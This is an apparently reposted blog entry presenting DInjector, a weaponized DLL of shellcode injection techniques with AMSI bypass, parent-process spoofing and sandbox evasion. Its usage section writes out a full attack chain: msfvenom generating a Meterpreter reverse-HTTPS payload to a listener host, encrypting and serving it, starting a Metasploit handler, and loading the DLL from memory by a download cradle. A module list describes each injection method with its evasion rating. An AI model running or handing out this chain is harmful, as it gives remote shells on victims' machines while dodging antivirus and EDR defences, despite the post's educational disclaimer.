Kali Linux

DInjector : Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL

DInjector repository is an accumulation of my code snippets for various shellcode injection techniques using fantastic D/Invoke API by @TheWover and @FuzzySecurity.

Features:

  • Fully ported to D/Invoke API
  • Encrypted payloads which can be invoked from a URL or passed in base64 as an argument
  • Built-in AMSI bypass
  • PPID spoofing and block non-Microsoft DLLs (stolen from TikiTorch, write-up is here)
  • Sandbox detection & evasion

ℹ️ Based on my testings the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when included as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrinked it a bit and included from source to achieve better OpSec.

DISCLAIMER. All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

Usage

  • Compile the project in VS.
  • Generate a shellcode for your favourite C2:

~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin

Encrypt the shellcode:

~$ encrypt.py shellcode.bin -p ‘Passw0rd!’ -o enc

Serve the encrypted shellcode and prepare C2 listener:

~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx “use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run”

  • Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.

 I do not recommend putting the assembly on disk because it will very likely be flagged.

Required global arguments:

NameExample ValueDescription
/am51True, FalseApplies AMSI bypass
/schttp://10.10.13.37/encSets shellcode path (can be loaded from URL or as a Base64 string)
/passwordPassw0rd!Sets password to decrypt the shellcode

Modules

 OpSec safe considerations are based on my personal usage expirience and some testings along the way.

FunctionPointer

module_name: ‘functionpointer’
description:
Allocates a RW memory region, copies the shellcode into it
and executes it like a function.
calls:
ntdll.dll:
1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’
2: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
opsec_safe: false
references:
‘http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/’
‘https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis’
‘https://www.fergonez.net/post/shellcode-csharp’

FunctionPointerV2

module_name: ‘functionpointerv2’
description:
Sets RX on a byte array and executes it like a function.
calls:
ntdll.dll:
1: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
opsec_safe: false
references:
‘https://jhalon.github.io/utilizing-syscalls-in-csharp-1/’
‘https://jhalon.github.io/utilizing-syscalls-in-csharp-2/’
‘https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs’

ClipboardPointer

module_name: ‘clipboardpointer’
description:
Copies shellcode bytes into the clipboard,
sets RX on it and executes it like a function.
calls:
user32.dll:
1: ‘OpenClipboard’
2: ‘SetClipboardData’
3: ‘CloseClipboard’
ntdll.dll:
1: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
opsec_safe: true
references:

CurrentThread

module_name: ‘currentthread’
description:
Injects shellcode into current process.
Thread execution via NtCreateThreadEx.
calls:
ntdll.dll:
1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’
2: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
3: ‘NtCreateThreadEx’
4: ‘NtWaitForSingleObject’
5: ‘NtFreeVirtualMemory (shellcode)’
opsec_safe: false
references:
‘https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs’

CurrentThreadUuid

module_name: ‘currentthreaduuid’
description:
Injects shellcode into current process.
Thread execution via EnumSystemLocalesA.
calls:
kernel32.dll:
1: ‘HeapCreate’
2: ‘EnumSystemLocalesA’
rpcrt4.dll:
1: ‘UuidFromStringA’
opsec_safe: false
references:
‘https://blog.sunggwanchoi.com/eng-uuid-shellcode-execution/’
‘https://github.com/ChoiSG/UuidShellcodeExec/blob/main/USEConsole/Program.cs’

RemoteThread

module_name: ‘remotethread’
arguments:
/pid:1337
description:
Injects shellcode into an existing remote process.
Thread execution via NtCreateThreadEx.
calls:
ntdll.dll:
1: ‘NtOpenProcess’
2: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’
3: ‘NtWriteVirtualMemory (shellcode)’
4: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
5: ‘NtCreateThreadEx’
opsec_safe: false
references:
‘https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs’

RemoteThreadDll

module_name: ‘remotethreaddll’
arguments:
/pid:1337
/dll:msvcp_win.dll
description:
Injects shellcode into an existing remote process
overwriting one of its loaded modules’ .text section.
Thread execution via NtCreateThreadEx.
calls:
ntdll.dll:
1: ‘NtOpenProcess’
2: ‘NtWriteVirtualMemory (shellcode)’
3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
4: ‘NtCreateThreadEx’
opsec_safe: –
references:
‘https://www.netero1010-securitylab.com/eavsion/alternative-process-injection’

RemoteThreadContext

module_name: ‘remotethreadcontext’
arguments:
/image:C:\Windows\System32\svchost.exe
/ppid:31337
/blockDlls:True
description:
Injects shellcode into a newly spawned remote process.
Thread execution via SetThreadContext.
calls:
kernel32.dll:
1: ‘InitializeProcThreadAttributeList’
2: ‘UpdateProcThreadAttribute (blockDLLs)’
3: ‘UpdateProcThreadAttribute (PPID)’
4: ‘CreateProcessA’
ntdll.dll:
1: ‘NtAllocateVirtualMemory (PAGE_READWRITE)’
2: ‘NtWriteVirtualMemory (shellcode)’
3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READ)’
4: ‘NtCreateThreadEx (CREATE_SUSPENDED)’
5: ‘GetThreadContext’
6: ‘SetThreadContext’
7: ‘NtResumeThread’
opsec_safe: true
references:
‘https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/’
‘https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs’

ProcessHollow

module_name: ‘processhollow’
arguments:
/image:C:\Windows\System32\svchost.exe
/ppid:31337
/blockDlls:True
description:
Injects shellcode into a newly spawned remote process.
Thread execution via NtResumeThread (hollowing with shellcode).
calls:
kernel32.dll:
1: ‘InitializeProcThreadAttributeList’
2: ‘UpdateProcThreadAttribute (blockDLLs)’
3: ‘UpdateProcThreadAttribute (PPID)’
4: ‘CreateProcessA’
ntdll.dll:
1: ‘NtQueryInformationProcess’
2: ‘NtReadVirtualMemory (ptrImageBaseAddress)’
3: ‘NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)’
4: ‘NtWriteVirtualMemory (shellcode)’
5: ‘NtProtectVirtualMemory (oldProtect)’
6: ‘NtResumeThread’
opsec_safe: false
references:
‘https://github.com/CCob/SharpBlock/blob/master/Program.cs’

Download
R K

Leave a Comment
Share
Published by
R K
Tags: A D/InvokeDInjectorDLLshellcode injection
3 years ago

Recent Posts

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

1 week ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

2 weeks ago

Red Team Certification – A Comprehensive Guide To Advancing In Cybersecurity Operations

Embark on the journey of becoming a certified Red Team professional with our definitive guide.…

3 weeks ago

CVE-2024-5836 / CVE-2024-6778 : Chromium Sandbox Escape via Extension Exploits

This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…

3 weeks ago

Rust BOFs – Unlocking New Potentials In Cobalt Strike

This took me like 4 days (+2 days for an update), but I got it…

3 weeks ago

MaLDAPtive – Pioneering LDAP SearchFilter Parsing And Security Framework

MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…

3 weeks ago